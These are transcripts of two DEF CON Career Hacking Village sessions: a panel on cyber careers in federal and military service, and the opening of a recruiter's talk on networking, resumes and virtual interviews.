DEF CON attendee in mind somebody with serious technical skills but somebody who also may not have ever worked for or with the government can you please talk about some of the opportunities provided by those organizations or programs that you're here to discuss today and if you want to talk about some of the benefits of serving through those programs and some of the challenges feel free to discuss those too. We'll get started with you John the same order please. Okay I didn't want to step on anything there Joe. So you know you talk about technical capability and obviously with the focus on cyber that's something that's inherent in what we do in CISA. We have as I said earlier a lot of the work almost all the work we do frankly is voluntarily based and so understanding how different things work and being able to link those things together create partnerships to help critical infrastructure better defend themselves is essentially one of the core things that we do. So if you've got a lot of really high price talent like we do from anything from intelligence analysts to incident responders to threat hunters who go online both externally and internally in the typical red team types looking through vulnerability management processes and all the things you might expect from a technical perspective and by the way we're hiring and I'm going to say that probably six times today. There are also less technical roles that we have in CISA that revolve around things like governance, policy, practice, partnerships and things like that. So it's a combination of technical and non-technical with a technical sort of a slant to help us do the mission that we are charged with doing. And I think one of the things that's important to remember is with the stand up of the agency we've had an opportunity to sort of reset the culture and one of the big things that Director Krebs has been pushing has to do with personnel development. How do we develop our folks from start to finish? What opportunities do we provide them for training, for education, opportunities to actually practice their craft? We have folks that get to do really cool stuff every single day and that's one of the great things about it and if you want to encapsulate that I want to one word it's about mission. We have a great mission, we have some great people to work on that mission and our objective is to train you, to develop you and to help make you as professional and as solid as you can be to do what you're charged to do and then work you into our structure and get on with it. The biggest thing and this is a personal philosophy of mine is train them, watch over them so they become good, help them develop and then turn them loose and let them do their job. And I think that there's a lot of value in that and by doing that I think we create a cycle of development and one thing to point out too and I think Liz might have said this earlier relates to in government and out of government. I have no problem with people leaving CISA, I like to keep them but when they go out into the private sector or they go into a different federal agency or a state local agency for that matter we always tell them you're always welcome back because they bring another wealth of experience with them if we provide them the opportunities to do that and encourage them to grow and to build on their skills. So that's sort of how we look at it from my perspective particularly if we're going to point right at some of the typical participants at DEF CON. Well thank you John and so the National Security Agency partners really closely with DHS and CISA and so a lot of what John said definitely applies to my mission to speak. So to answer Joe's question kind of you know what opportunities are available I thought I might just mention a little bit more about what NSA does and then I'll give you a couple of examples of things that you can do. The nice thing about the National Security Agency and the Department of Defense is that they are truly committed to lifelong learning as we know the cyber arena is so incredibly complex changes every single day the threats are different the nation state adversaries keep using different techniques so you have to say you know very active in your learning and that's on the job learning formal training and informal training and just a lot of opportunities that's the enterprise that I work run is the learning enterprise for so many intelligent brilliant people you know we have PhDs we'll continue you know you have to no matter what your grade level is in terms of your academics you keep going further so the National Security Agency is a unique asset for our country we save lives defense battle networks and we advance US goals and alliances so we were a met a member of the Department of Defense and the intelligence community so it makes it pretty interesting because your mission is so incredibly rewarding and to mention what John said about going in and out of the government sector in the private sector coming back we love that and it's valued and celebrated because the more talents and knowledge that you have you're going to help us be better and help our country be better and really really grow so the National Security Agency is a world leader in cryptology the art and science of making and breaking codes and it's an expertise that we get from people and technology right it's got here we really need that people component so if you find that you know the mission interesting you know definitely consider it and so the reason what makes it a little bit different is because for us to do our jobs well and really help our nation be strong we need to understand what our adversaries are doing what the capabilities are and we also be able to be able to communicate and exchange some of our information with our own allies and our senior leaders so we need to understand what's going on and then also provide for secure communications so it's pretty exciting with SIGIN and cybersecurity so the opportunities are tremendous at nsa.gov we have developmental programs you'll even get you know you'll be paid to get to continue your education while you're going through it we have tremendous opportunities for physicians there's computer network defense analysts computer network operators capabilities development specialists so folks that understand and provide real-time sensitive mission support by maintaining situational awareness of potential cyber threats they leverage technical methods to manage and monitor and execute large-scale operations so if you're if that sounds remotely interesting to you and as I said we really just we just want the best talent if that sounds remotely interesting to you I recommend you you know go to intelligencecareers.gov take a look at that and it might just be the time for you to take a look at it and really jump in and what you'll find is people have a profound sense of contribution and service to the nation we've had a number of incredibly brilliant people leave do startups then actually want to come back to the agency not for the money but because the mission and how incredibly rewarding it is to just be you know really putting Americans first so thank you so much for giving me the opportunity to talk about what we do because it's really really great and I hope you enjoyed us. Yeah thank you um and yeah so it's it USDS I feel is a pretty unique position so as an engineer at USDS we we talked on so many different projects there's so many different opportunities that we have to serve and make an impact so I would say just to someone coming to to USDS there's you really have a wide range of opportunities to find ways to make a great impact on the public and some of that is very technical work we develop and ship applications we we get websites working in the crash we do security audits we you know we do discovery sprints and and dig through systems and give recommendations to help an agency make improvements and make good investments in the technology but they all have in common is is a big impact and a big real-world impact on the public like like the others have said that the mission is really something that is just hard hard to beat and it's also something that really resonates um resonates with me but it's just everyone that we work with we're all here because of that we're here because we're we want to we are aligned on that mission to help people I come from the private sector a lot of folks in USDS do and for a lot of folks this is our first job in the in the private in the public sector and so you know I've worked around places and I've enjoyed my enjoyed my opportunities but you know I was looking for something more and I was looking for a way that I could use my skills to really do do the most that they could that really was was worth spending the time the effort to do to to you know pour my heart into all this work and to have it really be meaningful um but I would also say that you know engineers I'm an engineer I love engineering I love talking about tabs and spaces and crypto and what language is better and which editor to use but it's also not just about engineers it's it's also technology is important but it's also about solving the right problems and solving in a way that actually works for people so we're also looking for great designers we're looking for great product managers people who understand the way that technology is not a tool and a website since it's a tool but it's a service that needs to be designed the user in mind and designed in a way that works for them and isn't just kind of made to take off some requirements or some boxes it's got to be thought through from start to finish as a as an experience for the user that really works for them thanks Chris you know the Marine Corps Cyber Auxiliary is a unique organization right like some of us here it's a volunteer organization and what we're trying to do then is enhance the Marine Corps ability to operate in cyberspace so we recently came across the situation where we didn't have formally trained and designated Marines in cyberspace and it's only been within the last couple of years that we've had a an occupational field for cyberspace operations and we've now had the first Marines cross the yellow footprints at boot camp graduate and enter the field to become cyberspace operators in the Marine Corps we've had people operating the Marine Corps in cyber for 30 years of course but we've always been organized somewhat differently now we've come together formally under the 1700 MOS field and we are working together to to move forward what the cyber auxiliary does is it takes volunteers from civil service excuse me volunteers from the private sector and allows people who currently might serve serve billets in civil service or augmented through contractors or perhaps previously served and have been honorably discharged and it permits those people who are US citizens who have a minimum of three years experience in the cyber industry who are highly regarded in their field and are enthusiastic volunteers and it takes them brings them forward to help shape to train to educate to advise and to mentor the young Marines moving forward in cyber and we'll talk a little bit more about some of those opportunities that have come across and where people have made a huge impact suffice it to say that the cyber ox is part of that larger Marine Corps effort to posture our forces to operate in the information environment more effectively and we're managed by highly qualified talent in uniform and to wrap it all up frankly like Liz can point out if you are interested in wearing uniform and popping back in you've got an opportunity through her program however if you do not need to wear a uniform and if you are not particularly interested in crossing those physical security those physical fitness standards of a Marine of the military you'll still be welcome to join us here at the Marine Corps Cyber Exit Larry go ahead Liz. Thanks Roman so people who wish to wear a uniform the Cyber Specialty Direct Commissioning program might be for you if it's something you've considered at least consider applying you never know when your particular skills may be in high demand to help your nation accomplish their goals so and if you also have a leadership you know streak you know say I want to be a leader I want to help coach train mentor others and put my skills to work some of the skills that may are in demand as of when before I retired are software engineers looking for data scientists machine learning expertise open-sec engineers ICS data expertise I know John knows that's in high demand AI expertise as well so there's for example there's a whole center the BUD has built for artificial intelligence and last I checked Army was working with them to build some requirements for uniformed Army cyber warfare officers to come and work there with those holes at that joint artificial intelligence center. A high impact example of one of our great commissionees was we had a civilian who felt like he had made his fortune and was a prior service individual applied for the program and was accepted one of the first two people commissioned in the program helped build the virtual persistent training environment for all of the Army's cyber space operators to use this was a program that had been developing for many years but was really able to kick it into high gear and apply their software engineering expertise and really get it built and now the door functional fully operationally capable for people to use and I think people probably Diane at the agency may also use this persistent training environment that was built so you never know when you'll be able to have an impact until you try and so highly encourage everyone to consider serving in a uniform you can find more information about the current requirements at goarmy.com forward slash cyber that's the website you can go those there's a link there for the drip commissioning program and the current requirements should be listed there for you to review there's also instructions on how to apply so benefits of serving in a uniform so there are many benefits I think that for uniformed service the minimum number of years to achieve some of these benefits is three years and I think 90 days so given a tour you don't need to sign up for any longer than your first tour to achieve some of these but if you're interested in say the post 9-11 GI bill for your own professional education master's degree this can be transferred to your children or even to your spouse so that provides money for a graduate level an undergraduate degree programs for them also access to a VA loan program home loan program so we will to afford a home with a zero percent down zero down payment on the home that's something that uniform members of all services have access to that might be attracted to somebody who's interested in buying a home you should also know for salary army cyber worker officers most of our assignments are at Fort Gordon Georgia and Fort Meade Maryland so if you like Fort Meade and you like Fort Gordon so please consider cyber warfare might be the branch for you we don't have many positions in places like say Fort Hood Texas that's not so place to send people you don't have to be worried about going to Antarctica or Alaska or places that you be in we're far from locations and we also now have Army cyber headquarters is moving for Gordon I anticipate in the next year and also cyber command headquarters at Fort Meade Maryland that's another place we have a lot of assignments there but that's part of the requirements and there's developing locations where you can see future service so some other benefits are listed at military one source dot mill as website so and a little lot of listing all of them I encourage you go visit military one source dot mill or go army dot com for slash cyber to get that information there and one other place you can get information if you have your pencil handy is to on your phone text to the word cyberspace one word to 22828 and that will put you in contact with a recruiter at the office of the Chief of Cyber and they'll get in contact with you about opportunities to serve cool that was a that was a really great rundown everybody thank you so much um with us running out of time unfortunately for this panel I just wanted to to go down the list one more time see if you had any closing thoughts and words and any tangible advice that you like to share with the audience well sure um obviously coming into uh to government service has its challenges um there there is a challenge obviously between pay in the federal government and other government and the private sector there's the challenge of navigating the hiring process which can be very difficult in in government there's the challenge of getting the security clearance if you haven't gotten one already um and if you if you're considering coming to work with us in SZA you can help us to to push the envelope on all those challenges with the idea in mind that this is about the mission and if you come in with a mission focus you're going to have some great success the collateral to that in my mind is we are trying to take what was a headquarters component element now an operational agency and make a huge cultural change and some of the things that we're pushing are innovation speed partnerships and keeping it all within that mission focus so if if you have the desire we're looking we're hiring we've got plenty of positions both in the DC area and around the nation where we're looking for quality cyber talent and people who have a mission focus so I'll leave it at that Joe and I'll give it over to the next in line John Diane great thank you John and uh I just wanted to say you know consider this opportunity for federal service if you're ever the remotest interest in working with people that are innovative and passionate love what they do uh continual learners commitment to just partnering and collaborating is a great environment um you know and also want to mention for it is a little more male dominated as you know but there are professional communities like women in cybersecurity that give you a sense of community um outside the workplace to really help you give you the skills that you might need inside the workplace to navigate that so love to see you um and thank you so much yeah I would just say definitely um I never really thought that I would necessarily end up being a federal employee you never really know what's going to happen but you know we as technologists we have a really incredible amount of power with the skills that we have and government is a really great place to make a huge impact with that power so uh USDS we have a unique model where we turn you do terms of service so um it doesn't have to be a lifelong commitment uh we can do as short as like three to six months and up to four years so um if you want to do that and then go back to private sector then we are very happy to to have you um and have your impact uh USDS.gov is our website um and if you want to see also more information about some of the work we do at the bottom of the page we have our impact report we just listed talking about some of the the big projects that we've done in the last year including some of the things that that I've been lucky enough to work on but yeah we really are trying to break down that bridge uh build bridges and break down those walls between private and public sector and bring the best of private sector technology into government and improve everything for the American people. Thanks Chris we've all heard that advice you should bloom where you're planted and there've been many many opportunities to do that here if you'd like to be a marine there is a path in cyber if you want to wear a uniform if you find that you have other skills and perhaps you've held a career elsewhere in life you can still affect marines who serve by shaping capture the flag uh exercises and developing other tools that might help marines in uniform you might you can also assist with our summer programs helping with the young marines and helping to the helping with those who provide STEM education for young people in our country who are then shaped to serve themselves better through a cyber career path as you move forward one thing that I'd like to leave you with is you could follow us on LinkedIn and you can help to serve wherever you are in the nation today without having to wear a uniform but with having your heart in the right place and that brings us to Liz. Thanks Carmen so the somethings to keep in mind with uniform service that may not be as comfortable is the physical training requirements so if you're not familiar with some of the physical requirements for the different services um in particular my experience with the army you can find that on goarmy.com so the physical fitness test you'll need to take that place to hear and then you'll need to be able to pass those standards to pass your basic school so that's really very important to to understand and also keep in mind that your technologist like as Chris was describing you know a technologist focus but you're also a leader so an individual leader soldiers um in the army and the air force I understand it's a community program as well so great well thank you very much Liz and and everybody on the panel and and Kathleen and also Travis and the other folks behind the scenes the only things that I'm going to leave you with is a reminder about USAjobs.gov which is a huge database of a lot of opportunities for employment across the US government and also because I didn't mention it earlier as a disclaimer everybody's opinions expressed in this panel were their own and not necessarily those of any government entity and with that I'm going to hand it back over to Kathleen thank you so much everybody so great panel everyone thank you so much I know that you opened everyone's eyes to new opportunities for their careers I want the audience to know that also within the career coaches we do have at least 40 percent of the career coaches have had some kind of government service or military service so they are open to be able to provide you their perspectives and their tips on how to fulfill your career within national service we also do have resume reviewers recruiters who are familiar with recruiting for federal agencies and for government contractors thank you so much everyone and thank you to all of our panelists we'll see you for the next session
|
The National Service Panel highlights the opportunities and challenges with national service, focusing on tech-related programs across the federal government. The panel is organized by the Military Cyber Professionals Association (MCPA) and includes reps discussing the US Digital Service, US Marine Corps Cyber Auxiliary, National Security Agency (NSA), US Army Cyber Direct Commissioning Program, and Cybersecurity and Infrastructure Security Agency (CISA).
|
10.5446/51580 (DOI)
|
Welcome to Career Hacking Village. My name is Kathleen Smith. I'm one of the Village team members. We're so happy that we finally have been able to bring a Career Hacking Village to DEF CON. As we know, many of us are looking for a job and by recent studies, there were over 43 percent of people said they did not know how to find a job. So I'm very thankful to invite Kirsten Renner as one of the best recruiters in our community to sort of share some of the best practices, especially now. Please remember that we'll be doing discussion in Discord. We also have resume review and career coaching going on from 10 to 1700 on Friday and 12 to 1600 on Saturday. So without further ado, Kirsten. Hello DEF CON. I know that we always, we were in Vegas right now, but let's make the best of this. This is actually the first summer in 11 years that I am not there doing summer camp. I know that for a lot of you, it's 20 or more years. So this is crazy, but let's get through it and make the best of it. So this is my talk, but I still need a job. So this will be a conversation for the active candidates and also and mostly probably for the passive candidates as well. So I'm going to also offer the perspective of how this can be helpful, not just for candidates, but if you are trying to fill a job or if you have a job, if you will in the future, this is going to be relevant to you too. And here's why. Think about how this is going to offer to you. Think what are the challenges that candidates are facing so that you can help make things better for them. So we will go through initially what's new in our current times. Although I will say we're so far into this that we're probably all sort of getting to the point of being an expert at all the new things that we have to deal with, but I will touch upon them quickly. I will go through some tips. One thing that I want to do differently is show you how to hopefully take advantage of and use to your advantage. How the new circumstances can actually have a positive twist for you as well. And then we will go through what I like to call the fundamentals, the things that all candidates face and talk about on a regular basis. So who am I? As Kathleen mentioned, I am Carsten Renner. I am the director of recruiting at Nevada, an advanced analytic and cybersecurity firm. I'm a college shop out, started in software engineering, and then I went into IT and had that lead to recruiting. Well, when I was building help desks and in management, my favorite part was building the teams, finding the people to bring on to the teams. And so here I am 20 years later, random personal thing. I run ultras, alcohs or anything like that. I've been a marathon, I've done about a dozen of them in the last 10 years. And I have a almost disturbing love for grandkids. Also proud Army mom as in the last week. So I'm going to talk to you from a few different perspectives. So I have seen and heard and read many intelligent individuals offering useful advice from their perspectives on how to best find a job in our community specifically. And they're coming from the perspective of having been a candidate or a hiring manager or in some cases a recruiter. So I just happen to have been all of those things and I still am a couple of those things. So I'm hoping that I can take my 20-ish years of doing this and offer to you the things that I have seen definitely work and definitely not work and make those into tools that are going to work for you. So speaking of perspectives, the survey that you see on the screen is something that I put up on Twitter and LinkedIn. And anytime you see a survey in my slides, that's where I got from. Otherwise I would have stated the source. So I feel like it was a few months ago I heard, and this is not an exact quote, but Alyssa Miller was talking about a survey that she had put out for a talk that she was doing. I believe it was RSA, which she noted. And she said something along the lines of that there's a certain amount of responses that constitutes data maybe that makes it scientific. So this is not that, this is not thousands or times of thousands of responses. This is probably hundreds of responses. This is just little snapshots. This is before I started to do or to put together the talks and missions that I was going to do for this year. I wanted my community, the people that I speak to, the people that I interact with in the community to tell me what they face the most. What are they looking at the most? What do they want me to focus on and talk about? So that was the purpose of these. So again, I was actually a little bit surprised when I was looking at this. Are you actively looking? Are you passively looking? Where are you coming from from a candidate's perspective? And I did get Dorkbader's permission to quote him. Apparently when he responded to the survey, he responded with a comment that it was, it is really good and I couldn't come up with a better way to say it. So I asked him if I could quote him to guess. It is really good career hygiene to always be at least kind of keeping your ears and eyes open. That's how we do this. And as a random side note, technically, I met the CEO of my current company when I was happily employed and had no interest in looking for another job ever again. I was going to retire from the job where I was. So I think that's just a really good testimony to why you should always keep your eyes open. And we met at the Mandalay pool. So yeah, that's fun. Okay. So things are kind of different now, aren't they? Interviews are happening differently. Everything's happening differently. So we're going to go pretty quickly through some of the tips and reminders and I'll, I am Italian so I will tell a funny story or I find it funny. I'll probably laugh at myself as well. But before we go to the tips, I want you to know that one of the things that I am very passionate about when it comes to recruiting and my everyone that works for me, all the recruiters that work for me will tell you this is how business is done. You have to treat your candidates like they are the most important thing. The candidate experience is the basis upon which all the processes that I design and implement and analyze are based on the ideal candidate experience. So when I did an iteration of this presentation at B-side San Antonio a few weeks ago, people on Discord were commenting while I was giving the presentation as opposed to reporting it the way I am now and they were shocked. They were shocked when I said that the recruiters should always make you feel like they are your advocate and they care about you and this is about you, the candidate. It shouldn't be shocking to you. It is, it upsets me that it is shocking and we can make this better. Okay, so we together will make this better. Keep in mind that throughout your experience as a candidate, one thing that is really an advantage to you is that your future employer, which is everyone that you are interviewing with and everybody that you are talking to, is going to reveal to you in all likelihood what it will be like to work for them. I believe, right, and on the other hand, as a recruiter, the way that you are behaving as a candidate is going to give me a little view into what it is like to work with you, right? So let's do, let's be kind both ways. Let's be reasonable both ways. Again, keep in mind, if they aren't flexible, if they aren't accommodating, if they won't give you a break and let you be a human and meet you halfway, what's it going to be like to work there? So keep that in mind while you're facing challenges in our current environment. So let's just go through a couple of the pointers. I sense this is recorded. You can take a screenshot of this. You can save it. I won't read it all verbatim. However, test, test, test. I logged in eight minutes early for this recording and guess what? I had to fix some things. Some things weren't working. So test your stuff, right? Test your camera, test your microphone, test everything. I will also tell, here's a funny story. When I was presenting at the Many Hats Club isolation con earlier this year, my first ever virtual presentation, by the way, I logged in to Green Room and Ray Redacted was there and he said, let's test it out. Let's see. So many of us will have many iterations of our browsers open at one time with 10 or 15 tabs per browser at one time. Let me tell you something. Close all that stuff. Close all the things. So many things can happen. My company is a Google shop. So if I had any of those Google windows open right now, while I'm trying to do this via Zoom, the camera is going to get confused and it's going to say, who's trying to use me and it's never going to work, right? You may not even realize that some minimized window is stealing your camera. So very important. Back to the Ray story. Don't just close the windows. Close the document. When I shared my screen with him as a test, guess what? The first thing that popped up on his screen, I couldn't see it. So a lot of us will have many monitors open at once as well. You don't know what you have minimized. You don't even remember. It was my credit report. I gave my Social Security number, date of birth, credit report and credit explanation to a hacker just like that. So close all the things. So when I say close all the things, by the way, I get the song, hack all the things stuck in my head and then I say close all the things. But I won't say anything to you today. I'll go through a few more things. Look out for distractions. My dog right now is about a foot away from me. He's always about a foot away from me. If anything happens, he will start barking. Okay? Notice there's a glare on my glasses right now. So do as I say and not as I do. My dog's in the room. My glasses have a glare on them. But notice things like that. Notice what's going on in the background. If I were to take my screen down, you would see my bulletin board and it has a lot of interesting things on it and that would distract you. So if you're going for your virtual interview, just be reasonable and be aware of what could be distracting. I turned off all my phones, which by the way, is hard for me because my son is at basic training and I'm trying to have my phone ready for any calls. But turn off all your phones. Turn off all the things. So be aware of noises that you make. Don't sip on your coffee. Just wait until it's over. That can sound really gross, especially if whoever's interviewing you has headphones on. If I start shifting the papers around on my desk, doesn't that sound shitty? Don't do that. Don't shift things around. Don't hold your pen in your hand like I am right now. Don't do what I'm doing. All right, another thing you can do, and actually I'll give ready credit for this one too. I won't tell you what he calls it, but look into the camera. So I personally am distracted right now because I can see myself. I can see the slide. I can see my notes. But try to look into the camera to make this more engaging. It stinks that I can't see all of you. I love you. I wish I could see your faces, but look into the camera. It makes you more engaging. Okay, so one size does not fit all. What do I mean by that? In my upcoming slides, when I go through the fundamentals, I'm going to be mentioning to you what I think are going to be useful ways for you to be your own best advocate and be successful as a candidate. Are all the things going to fit all the people all the time? Surely not. Right? Because we already covered that many of you are in different stages. So frankly, if you're in the, I don't have a job. I'm trying to keep the lights on. I'm trying to get a paycheck. You're going to have different standards and perspectives that are going to make you make different decisions during your candidacy journey. And all of us, the best of us, a lot of us have found ourselves at times unemployed not by choice, right? It's happened to me. And guess what? I had to take the first thing that came along. So I could pay my bills at that time. So that's another stage that you could be in throughout your career. So just keep in mind that I'm offering to you different tools that will make sense at different times. So my recruiting team, where I currently work, is not part of HR. And I'll tell you why. We're part of operations. And this is something that I always hoped I would be able to do. And I'm thankful that I can now be part of operations so that we're not working against our customers, right? Because if the talent that works at the company is just as much of a tool commodity, if you will, as the hardware, as the software, then in fact, recruiting is part of the operations of that company, right? To provide the services, to provide the software or the products or whatever it is, you need the right tools. People are tools in this instance, in this metaphor. So when I look back at my very brief time of being a software engineer, back in the back in the early 90s, using Visual Basic, as a software engineer, when you're trying to solve a problem, what did I do to solve the problem? You do intakes. You do intakes for the purpose of what? Defining requirements with all of your stakeholders with your customers and so forth. Then you do what? You plot and you plan and you write boards and you try to come up with a strategy and implement and you test and you analyze, rinse, repeat. That's also recruiting when done properly. This is listening. I'm going to do what as a recruiter? I'm going to talk to the candidates, make it about them, figure out what their requirements are, preferences, requirements, and rank those requirements, right? I'm going to find out what's most important. I'm going to do a proper write up and deliver that to the customer in this case being the hiring manager. I'm also, as a stakeholder, a stakeholder is also your customer and that would be the hiring manager. So think of the recruiter as an engineer in this case or as a hacker if you will, because what they're going to then try to do, and I don't mean hacker in the sense of, you know, people think of social engineering and manipulating and being tricky and crazy. I'm not thinking about that. What I'm thinking about is understanding the machine of the human, getting to know them, finding the requirements from each individual. Every single one of them is different. The hiring managers are different. The candidates are all different and then finding the right match. So it's not so much hacking, manipulating that sort of thing. It's not social engineering. It's really engineering. It's really designing and really finding the solution that will make the problem apps between those two parts to get them all the way to finish line. So let's talk about item number one as a, one of the areas people want health with, they want health. I said, what do you need the most health with? Is it searching? Is it finding? Is it resume writing? Which I thought and I used to always hear was the big problem. But they said networking. I posted my very first job opening printed it, fasted to a newspaper, a paper newspaper. This is when the internet was but a thought. And we've come a long way since then. Let's talk about what we can do in the networking area. We all know about job boards. I'm not going to list everything on here. I am not here, oh, by the way, to promote for docs anything that I have listed here that is a product. I put that out there, but I will talk about how some of them are useful. All right. Everybody knows about job boards, but you may or may not know about state employment sites. And here's the reason I'm going to mention that to you. If you go every single state has one promise. Now because their local government municipality run websites, they might suck. They might not be user friendly. They might not be easy to get your way around on. However, they are there. They are there and they are listing. They are supposed to list every opening. And here's how that works. All the companies that are hiring probably have an applicant tracking system and they have scraping tools that are happening in the background, and that are delivering those job openings to all the state employment boards. The reason that this can be useful to you. And when I did this talk and Tampa in person, I said, let's do an experiment. Everybody whip out your phone. So do this later if you want. What about your phone? Go find either your state employment job board or the state that you want that you're targeting that you want to move to or that you're interested in and search around and see what's posted. And you know what you're going to find out that there's jobs that you had no idea that that company was hiring in your state. In fact, in our current environment, you are more likely to see jobs that you never knew were available where you are because they're available virtually now. So enough about that. No, I'm not getting paid by the state government. I just wanted you to know that people may not realize that that's the only possible. So please, here's another thing. Actually, somebody split up in my last talk and told me I was last in person one, told me that I was incorrect, but in this case, I'm not. Don't pay. Don't pay anyone for anything. Sorry, people get paid to do stuff, but there's way too many people willing to help you for free. Way, way, way too many people willing to help you for free with your resume, with your interview skills happening right now here today at DEF CON. It happens at all to these sides. Thanks, Kathleen. There are people who will help you learn how to interview better. There are people who will help you write your resume better. Okay. In particular, one of the things listed on this slide says, hey, user, do you want to be a premium user? Pay me lots of money. And then the recruiters will be able to find you better. Actually, there's four or five people listed on this site who probably are mad because they're sites because they want you to pay as a user. Don't do it and I'll tell you why. Because the recruiters, because the companies who are hiring are already paying the money. Lots and lots and lots of money to find you regardless of your account, regardless of whether you have one and certainly you don't need a premium one. Promise. I just don't want you to waste your money. But you can if you want to. So I haven't recruited in a while, excuse me, but I know that pretty much all recruiters have a LinkedIn account and we will get to how to communicate with them through that and most of them have all of the ways that you can connect to them open as well. I know it's hard right now, but conferences are amazing. I can't speak enough about it. I can't tell you how much they have been valuable to me in well over a decade. The greater part of my success and I'm a pretty successful recruiter is through the conferences, through the community and through networking, not just the happy hiring hours and all that junk, but the industry conferences in particular are the most valuable. And if you have the opportunity ever to volunteer at one of them, I promise it's going to be multiple beneficial to you. It will be so advantageous to you to be a volunteer. You will learn and you will grow and your network will flourish when you volunteer in any way that you can. So raise your hand, volunteer. Okay, so real quick about this, you may or may not be able to see these images. I threw them together very, very quickly. I hear you when you said, the recruiters are horrible. They're horrible. They reach out to me and they say horrible things to me and they say things that make no sense and why are they asking me all these questions? I get it. I'm going to talk to you about two different perspectives here real quick. The top is a quick snapshot of my LinkedIn. My LinkedIn says, oh, by the way, if you're a recruiter and I don't know you, I won't accept your connection request. PS, I'm not looking for a job. It says it right there. However, you can also see this dude reaches out and says, do you want to recruit for me? So I get it, buddy. You're doing the same. My recruiters do their thing as well. However, I also hear a lot of you saying or I see a lot of you saying, are you serious? You just ask me if I wanted to be a Java developer and I'm a CTO. This is kind of like that. Right? No, I don't want to stop being a director and go source for you. I get it. It happened. I'm sorry. But it's also an opportunity and this could be an opportunity even if I had time for me to talk to this person and to say, you know what, you'll notice that no, I'm not looking. However, I do know somebody who is or maybe you should look in this direction or that direction. So everything's always an opportunity to network and to help others as well. Also real quick snapshot down here is 15 or so people who are all they said to me in my DMs is, hey, and that's all they said. Sorry, not answering you. So I'm not saying you have to tell me something super clever or write a full dissertation or anything crazy like that, but you have to compel the people you're reaching out to to take the extra step. I heard I read, yeah, three to five seconds. All right. So I'm just going to do slightly better than just, hey, because frankly, people like recruiters who open up their DMs to you on social media are kind of making themselves vulnerable when they do that. They're doing it for you so that they can help you. But we're also opening it up to creepy things that people send us every once in a while. So be kind. Okay. So let's talk about resume real quick. Obviously be truthful on your resume. I will go through the guidelines that I think make your resume most effective for you. However, remember what I said about responses and communicating on DMs. So let me tell you what to do real quick. And I really want to hear your responses someday. However, you get around to it, letting me know if this worked for you. People don't get back to you. I could be one of those people. I'm guilty of it. It happened. I'm sorry. Remember that you're not the only person that they're hearing from. Okay. So how can you get them to respond to you? Because I'm betting that most of them, them being the recruiters, want to talk to you. They want to help you, right? But they have a great volume of people that they're trying to help. So please remember that you're not alone. There's a lot of people in the inbox. How can you get them to respond to your application when you apply? Apply? Wait. Wait a couple of days. Not longer than that. Then go to LinkedIn. Look for ABC company wherever you apply. Probably a recruiter works there. Certainly click the people button. You look for who has the recruiter title. You send them a DM. Hi, Jim. It's me, Mary. I apply for ABC. Look for an identifier when you apply for the job that can help them look and find the job. There's usually a rec ID or something like that. Look for that. Mention it. So then they're going to go look for your application. And when you reach out, you say, I applied for this. Can't wait to hear back from you. Okay. Probably they're going to reply in one business day. They're going to see your message. They're going to reply. They may have never seen your application. Sorry, it happened. They probably have 50 jobs to fill. They probably have 50 applications per week or more per job. So now what are you going to do? If you don't hear back from that recruiter, first of all, if it was one of my recruiters, tell me. If it was any recruiter and they don't get back to you in a day, if you want, the next step could be look for a director of whatever the engineering department is. If you have a director of that department as well, you say, Hey, hi, Jane. I applied for this position. I reached out to so and so can't wait to hear back. Let me know if you need anything else from me. Now really probably I just kind of got to the career and trouble, but you're probably going to do that. Okay. So let's go really quickly through how to write your best resume. Start. Please, please, please. Here's my name. Actually, with or without a name, here's the most important part. I'm a this and I want to be a that. This is the block. This is the bottom line up front. I'm this and I want to be a that. Do not assume that the person reading your resume has the time or the technical qualifications or that they're not totally fatigued out on resumes to know, to be able to look through your resume and know what do you do and what do you want to do? Hi, I'm a systems engineer looking to be a solutions architect. I am a developer looking to manage programs, just one or two sentences. Help me out. Then I know how to proceed with you. Then you're going to do your technical, put the technical in there, the technicals that you've used the tools, the software, the hardware that are chronological. People argue about the length of resumes. Obviously shorter is better. It's less to have to read, but don't feel like it has to be one or two pages. You know, we are reasonable. Frankly, if you're in the cleared space or if you would like to be in the cleared space, it's helpful to either mention that you do have it clearance and or that you are eligible and willing to get one. PDF is fine. If it used to be fine, it is fine now. Remember if no one was responding up to you to ping, send a message, send a little reminder, be patient. And customize each resume per the job within reason. Does my resume make sense? As your experience grows, it may become harder for whoever is looking at your resume to get to realize which thing you're trying to do. So on to the interview. Try to do a little research on the company up front. It doesn't have to be that big of a deal, but just, you know, don't be so, I'm interviewing somebody who's like, I can't even remember who I'm talking to. You know, do a little bit better than that. Do a little bit of research. Try to find a way when it makes sense to answer as many of the questions as you can in the form of a story. What's your strength? What's your weaknesses? You know, all those kind of questions. Well, funny you should ask. One time I was building a robot and it was supposed to cross the street, but it actually blew up in the middle of the street. And so I learned that in the future, you don't cross the red and blue wires and you always bring a fire extinguisher, whatever. You just revealed to me the way that you learn from mistakes, the way that you prepare to solve problems in the future. You invited me into a little bit about your problem solving skills and so forth. So look for a way. Think about it in advance. What are some stories that you can tell? You know, kind of about things that have occurred for you. Also this is where I'm going to ask you to give yourself a chance to be a real person and put the person on the other side of the table as a real person as well. They almost always say, go and make questions for us at the end, right? So hopefully they're not a grandstander and they've been trained properly how to interview and give you the opportunity to shine and not make it about them and all the things that they've done. However, make them into a person and they won't be ready for this. Say to the interviewer when they ask, do you have any questions? Yes, actually I do. When you were looking at coming to this company, did you have any reservations about working here and how did that turn out? Wow, what a question. That's going to tell you a lot. Maybe they're going to say, you know, actually my kid has soccer three times a week and I was concerned about the commute and turns out they gave me a chance to do this, this and this to make that better, right? They're going to make themselves into a person and they're going to help you envision being an actual person working there instead of being all technical. Other favorite questions? Yeah, actually tell me, I see you've been, how long have you been working here three years? Cool. I'm going to wait for it. What a revealing thing for them to have the opportunity to tell you what have they learned here because if they haven't learned anything, it's going to be very revealing, right? So I'm not telling you to trick them, right? This is a social thing. This is making them into a person. They're really going to tell you. I often liken interviewing to dating. I actually don't have any dating experience, but I imagine that if you went on a date and you sat down and you said, I love kids, I love traveling, I go to church every Sunday and none of those things are true. You have probably just guaranteed that that relationship isn't going to work out. So don't show up at the interview and be like, I love solving problems. I'm an independent worker. Actually I love working on teams. All these things that you're saying about yourself, if they're not true, you're hurting you and them, right? So make it real. And here's the thing, you might reveal something about yourself and then the interviewer might say, you know what? James, what you told me means that you won't be a good fit for this. But turns out you're a perfect fit for this other thing that we didn't even know we should be talking about, right? So if they're doing a good job, the more you tell them about the real you, the better off you both will end up. Okay, so really, really, really, really I want you to be yourself. I want you to be honest. My hair was blue at my last interview. It is what it is. It's okay to pivot. I mentioned that I was a software 